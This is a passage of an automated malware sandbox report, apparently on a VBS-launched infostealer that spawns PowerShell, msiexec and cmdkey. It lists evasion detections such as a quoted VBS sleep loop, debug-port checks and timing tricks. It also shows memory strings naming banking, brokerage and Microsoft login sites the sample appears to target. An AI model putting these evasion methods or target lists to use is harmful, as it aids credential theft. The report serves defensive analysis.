          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Potential evasive VBS script found (sleep loop)
          Source: Initial fileInitial file: Do While Pfalzgreverne.Status = 0 WScript.Sleep 100
          Switches to a custom stack to bypass stack traces
          Source: C:\Windows\SysWOW64\cmdkey.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
          Source: C:\Windows\SysWOW64\cmdkey.exeAPI/Special instruction interceptor: Address: 7FF8C88ED7E4
          Source: C:\Windows\SysWOW64\cmdkey.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
          Source: C:\Windows\SysWOW64\cmdkey.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
          Source: C:\Windows\SysWOW64\cmdkey.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
          Source: C:\Windows\SysWOW64\cmdkey.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
          Source: C:\Windows\SysWOW64\cmdkey.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
          Source: C:\Windows\SysWOW64\cmdkey.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2216D1C0 rdtsc 10_2_2216D1C0
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4894Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5036Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6658Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3021Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeAPI coverage: 0.1 %
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5692Thread sleep time: -1844674407370954s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6044Thread sleep time: -4611686018427385s >= -30000sJump to behavior
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cmdkey.exeLast function: Thread delayed
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: firefox.exe, 0000000E.00000002.3468210308.000001CF4015E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll}}_
          Source: msiexec.exe, 0000000A.00000002.3167761730.0000000000A5A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.3126476457.0000000000A5D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWx
          Source: cmdkey.exe, 0000000C.00000002.3470610274.00000000080E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,1169642
          Source: powershell.exe, 00000004.00000002.2380674128.0000019E3F373000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll1137Z0
          Source: cmdkey.exe, 0000000C.00000002.3470610274.00000000080E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
          Source: cmdkey.exe, 0000000C.00000002.3470610274.00000000080E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n PasswordVMware20,11696428655x
          Source: cmdkey.exe, 0000000C.00000002.3470610274.00000000080E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,116X
          Source: msiexec.exe, 0000000A.00000002.3167807046.0000000000A83000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.3059746881.0000000000A83000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.3059920799.0000000000A83000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: cmdkey.exe, 0000000C.00000002.3470610274.00000000080E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
          Source: msiexec.exe, 0000000A.00000002.3167807046.0000000000A83000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.3059746881.0000000000A83000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.3059920799.0000000000A83000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: cmdkey.exe, 0000000C.00000002.3470610274.00000000080E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
          Source: cmdkey.exe, 0000000C.00000002.3470610274.00000000080E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
          Source: cmdkey.exe, 0000000C.00000002.3470610274.00000000080E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
          Source: cmdkey.exe, 0000000C.00000002.3470610274.00000000080E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kers.comVMware20,11696428655}
          Source: cmdkey.exe, 0000000C.00000002.3466952802.000000000316D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: PING.EXE, 00000002.00000002.2193234156.000001A3DB1F9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllww
          Source: cmdkey.exe, 0000000C.00000002.3470610274.00000000080E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
          Source: cmdkey.exe, 0000000C.00000002.3470610274.00000000080E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
          Source: cmdkey.exe, 0000000C.00000002.3470610274.00000000080E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,1
          Source: cmdkey.exe, 0000000C.00000002.3470610274.00000000080E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
          Source: cmdkey.exe, 0000000C.00000002.3470610274.00000000080E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
          Source: cmdkey.exe, 0000000C.00000002.3470610274.00000000080E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
          Source: cmdkey.exe, 0000000C.00000002.3470610274.00000000080E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20v
          Source: wscript.exe, 00000000.00000002.2199014767.000001B0BE9A2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\rEmulo@
          Source: cmdkey.exe, 0000000C.00000002.3470610274.00000000080E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x.intuit.comVMware20,11696428655t
          Source: cmdkey.exe, 0000000C.00000002.3470610274.00000000080E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
          Source: cmdkey.exe, 0000000C.00000002.3470610274.00000000080E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ist test formVMware20,11696428655
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\cmdkey.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2216D1C0 rdtsc 10_2_2216D1C0
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_049096D9 LdrInitializeThunk,6_2_049096D9
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22127208 mov eax, dword ptr fs:[00000030h]10_2_22127208
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22127208 mov eax, dword ptr fs:[00000030h]10_2_22127208
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220E823B mov eax, dword ptr fs:[00000030h]10_2_220E823B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221C5227 mov eax, dword ptr fs:[00000030h]10_2_221C5227
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221AB256 mov eax, dword ptr fs:[00000030h]10_2_221AB256
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221AB256 mov eax, dword ptr fs:[00000030h]10_2_221AB256
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220E9240 mov eax, dword ptr fs:[00000030h]10_2_220E9240
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220E9240 mov eax, dword ptr fs:[00000030h]10_2_220E9240
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220F6259 mov eax, dword ptr fs:[00000030h]10_2_220F6259
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220EA250 mov eax, dword ptr fs:[00000030h]10_2_220EA250
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2212724D mov eax, dword ptr fs:[00000030h]10_2_2212724D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22131270 mov eax, dword ptr fs:[00000030h]10_2_22131270
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22131270 mov eax, dword ptr fs:[00000030h]10_2_22131270
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220E826B mov eax, dword ptr fs:[00000030h]10_2_220E826B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22119274 mov eax, dword ptr fs:[00000030h]10_2_22119274
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221A0274 mov eax, dword ptr fs:[00000030h]10_2_221A0274
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221A0274 mov eax, dword ptr fs:[00000030h]10_2_221A0274
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221A0274 mov eax, dword ptr fs:[00000030h]10_2_221A0274
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221A0274 mov eax, dword ptr fs:[00000030h]10_2_221A0274
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221A0274 mov eax, dword ptr fs:[00000030h]10_2_221A0274
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221A0274 mov eax, dword ptr fs:[00000030h]10_2_221A0274
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221A0274 mov eax, dword ptr fs:[00000030h]10_2_221A0274
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221A0274 mov eax, dword ptr fs:[00000030h]10_2_221A0274
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221A0274 mov eax, dword ptr fs:[00000030h]10_2_221A0274
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221A0274 mov eax, dword ptr fs:[00000030h]10_2_221A0274
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221A0274 mov eax, dword ptr fs:[00000030h]10_2_221A0274
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221A0274 mov eax, dword ptr fs:[00000030h]10_2_221A0274
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220F4260 mov eax, dword ptr fs:[00000030h]10_2_220F4260
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220F4260 mov eax, dword ptr fs:[00000030h]10_2_220F4260
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220F4260 mov eax, dword ptr fs:[00000030h]10_2_220F4260
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221BD26B mov eax, dword ptr fs:[00000030h]10_2_221BD26B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221BD26B mov eax, dword ptr fs:[00000030h]10_2_221BD26B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2212329E mov eax, dword ptr fs:[00000030h]10_2_2212329E
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2212329E mov eax, dword ptr fs:[00000030h]10_2_2212329E
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22170283 mov eax, dword ptr fs:[00000030h]10_2_22170283
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22170283 mov eax, dword ptr fs:[00000030h]10_2_22170283
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_22170283 mov eax, dword ptr fs:[00000030h]10_2_22170283
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2212E284 mov eax, dword ptr fs:[00000030h]10_2_2212E284
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2212E284 mov eax, dword ptr fs:[00000030h]10_2_2212E284
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221C5283 mov eax, dword ptr fs:[00000030h]10_2_221C5283
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221792BC mov eax, dword ptr fs:[00000030h]10_2_221792BC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221792BC mov eax, dword ptr fs:[00000030h]10_2_221792BC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221792BC mov ecx, dword ptr fs:[00000030h]10_2_221792BC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221792BC mov ecx, dword ptr fs:[00000030h]10_2_221792BC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221002A0 mov eax, dword ptr fs:[00000030h]10_2_221002A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221002A0 mov eax, dword ptr fs:[00000030h]10_2_221002A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221052A0 mov eax, dword ptr fs:[00000030h]10_2_221052A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221052A0 mov eax, dword ptr fs:[00000030h]10_2_221052A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221052A0 mov eax, dword ptr fs:[00000030h]10_2_221052A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221052A0 mov eax, dword ptr fs:[00000030h]10_2_221052A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221872A0 mov eax, dword ptr fs:[00000030h]10_2_221872A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221872A0 mov eax, dword ptr fs:[00000030h]10_2_221872A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221862A0 mov eax, dword ptr fs:[00000030h]10_2_221862A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221862A0 mov ecx, dword ptr fs:[00000030h]10_2_221862A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221862A0 mov eax, dword ptr fs:[00000030h]10_2_221862A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221862A0 mov eax, dword ptr fs:[00000030h]10_2_221862A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221862A0 mov eax, dword ptr fs:[00000030h]10_2_221862A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221862A0 mov eax, dword ptr fs:[00000030h]10_2_221862A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221B92A6 mov eax, dword ptr fs:[00000030h]10_2_221B92A6
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221B92A6 mov eax, dword ptr fs:[00000030h]10_2_221B92A6
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221B92A6 mov eax, dword ptr fs:[00000030h]10_2_221B92A6
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_221B92A6 mov eax, dword ptr fs:[00000030h]10_2_221B92A6
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2211F2D0 mov eax, dword ptr fs:[00000030h]10_2_2211F2D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_2211F2D0 mov eax, dword ptr fs:[00000030h]10_2_2211F2D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220F92C5 mov eax, dword ptr fs:[00000030h]10_2_220F92C5
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_220F92C5 mov eax, dword ptr fs:[00000030h]10_2_220F92C5
